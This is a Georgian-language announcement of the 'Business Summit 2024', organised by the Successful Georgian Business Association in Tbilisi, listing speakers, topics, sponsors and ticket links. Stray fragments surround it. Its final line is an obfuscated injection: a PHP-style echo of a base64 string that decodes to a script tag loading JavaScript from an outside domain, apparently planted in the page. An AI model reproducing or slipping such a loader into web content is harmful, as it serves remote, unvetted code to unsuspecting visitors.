celsiusi
ავერსი შნაიდერი

წარმატებული ქართული ბიზნესის ასოციაციის (SGBA) ორგანიზებით, საქართველოში წლის მთავარი ბიზნეს მოვლენა „ბიზნეს სამიტი 2024“ გაიმართება. თუ გაქვთ ბიზნესი და გსურთ ფართო აუდიტორიას გააცნოთ ის, შეხვდეთ კონკურენტებს და პოტენციურ პარტნიორებს. ასევე, თუ მუდმივად ცდილობთ განვითარდეთ და სფეროს წარმატებული სპეციალისტების გამოცდილება გაიზიაროთ, ეს სამიტი თქვენთვისაა.

ღონისძიებას 24 მაისს, სასტუმრო Hotels & Preference Hualing Tbilisi უმასპინძლებს. ასოციაციის პრეზიდენტის, მაია ტატულაშვილის განცხადებით, 500 დელეგატისგან შემდგარი სამიტი მთელი დღის განმავლობაში გაგრძელდება და სხვადასხვა მრავალფეროვან და საინტერესო აქტივობებს შესთავაზებს დამსწრე საზოგადოებას.

„სამიტის მიზანია ასოციაციის წევრ კომპანიებს შორის თანამშრომლობისა და ურთიერთობების გაღრმავება. ასევე, ბიზნესისთვის საინტერესო პროექტებისა და საჭიროებების განხილვა, ახალი ინიციატივების ინიცირება და სხვადასხვა სახის ურთიერთმხარდამჭერი ღონისძიებების დაგეგმვა, როგორიცაა პიარი, სტრატეგიული კომუნიკაციები, გაყიდვები, მარკეტინგი და ხელოვნური ინტელექტი", - ამბობს მაია ტატულაშვილი.

სამიტის მიმდინარეობისას 30 ქართული ბიზნეს კომპანია წარადგენს სპეციალურ კორპორატიულ შეთავაზებას ბიზნესისთვის. ასევე, კომპანიები წარადგენენ პრეზენტაციებს, რომლის ფარგლებშიც სამიტში მონაწილე დელეგატები მიიღებენ ინფორმაციას მათ მიერ დაგეგმილი ბიზნეს ინიციატივების, ინოვაციური პროდუქტების, ბიზნეს პროექტებისა თუ წარმატების ისტორიის შესახებ.

სამიტი უმასპინძლებს 10 წარმატებულ ქართველ ბიზნეს-ტრენერს. ტრენერები გამართავენ მასტერკლასს და გაუზიარებენ დამსწრე საზოგადოებას მათ გამოცდილებას სხვადასხვა სფეროდან.

სამიტის ერთ-ერთი პანელი დაეთმობა ხელოვნურ ინტელექტს - როგორც ახალ შესაძლებლობას წარმატებული ბრენდის შესაქმნელად.

სამიტზე წარმოდგენილი იქნება PR ტექნოლოგიები. ამასთან, ღონისძიების ფარგლებში კომპანიებს შესაძლებლობა მიეცემათ წარმოაჩინონ საკუთარი ბრენდები და პროდუქტები სხვადასხვა ფორმატის სტენდებითა და სარეკლამო მასალებით. ქართული ბიზნეს კომპანიების დელეგატებს შესაძლებლობა ექნებათ გაეცნონ მომდევნო წლისთვის დაგეგმილ ბიზნეს სიახლეებს და პროექტებს, მოახდინონ კომუნიკაცია და შექმნან კოლაბორაციის შესაძლებლობები.

სამიტის 500-ვე დელეგატს გადაეცემა სასაჩუქრე ჩანთა, რომელშიც წამყვანი კომპანიების მიერ საინტერესო შეთავაზებები და ფასდაკლების ვაუჩერები იქნება განთავსებული.

ღონისძიებაზე დამსწრე საზოგადოების წინაშე წარსდგებიან წარმატებული ქართველი ბიზნეს-ტრენერები:

ნოე სულაბერიძე - თემა: პიარის როლი ტელევიზიაში - სატელევიზიო გადაცემების გავლენა საზოგადოებრივი აზრის ფორმირებაზე;

კახა მაღრაძე - თემა: პიარი 21-ე საუკუნეში;

რუსუდან თელია - თემა: 2024 წლის HR ტრენდები;

გიგი გიორგაძე - თემა: როგორ შეგიძლიათ ხელოვნური ინტელექტის გამოყენება საქართველოში;

ირაკლი ბესელიძე - თემა: რა არის ბრენდინგის მომავალი;

თეონა ბაღდავაძე - თემა: როგორ შევინარჩუნოთ ქაოტურ სამყაროში თვითმყოფადობა და დავრჩეთ მუდამ აქტუალურები;

მაკო ჯაოშვილი - თემა: საზოგადოებასთან ურთიერთობა ბრენდის წარმატებაში;

გურამ შეროზია: თემა: რას აძლევს ინფლუენსერების ჩართულობა ბიზნესს;

აგრეთვე, აუდიტორიის წინაშე წარსდგებიან სხვა წარმატებული ტექნოლოგიური სტარტაპ კომპანიების დამფუძნებლები.

პროექტის მხარდამჭერები და თანაორგანიზატორები არიან პიარ საკონსულტაციო კომპანია Fame Consulting, პროფესიონალური ქოუჩინგის საერთაშორისო უნივერსიტეტი Coaching UP University – Georgia, არასამთავრობო ორგანიზაცია Women's Information Center, Alterbridge University - უნივერსიტეტი ალტერბრიჯი და Georgian ai association.

დაინტერესებულ პირებს შესაძლებლობა აქვთ დაესწრონ ღონისძიებას. ბილეთების შეძენა შესაძლებელია საიტზე: https://forms.gle/fut94kiZGQJaNGPd6

სამიტის შესახებ დამატებითი ინფორმაცის მისაღებად ეწვიეთ ვებ-გვერდს https://www.facebook.com/geobusinessnewssgba

(R) 

461
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");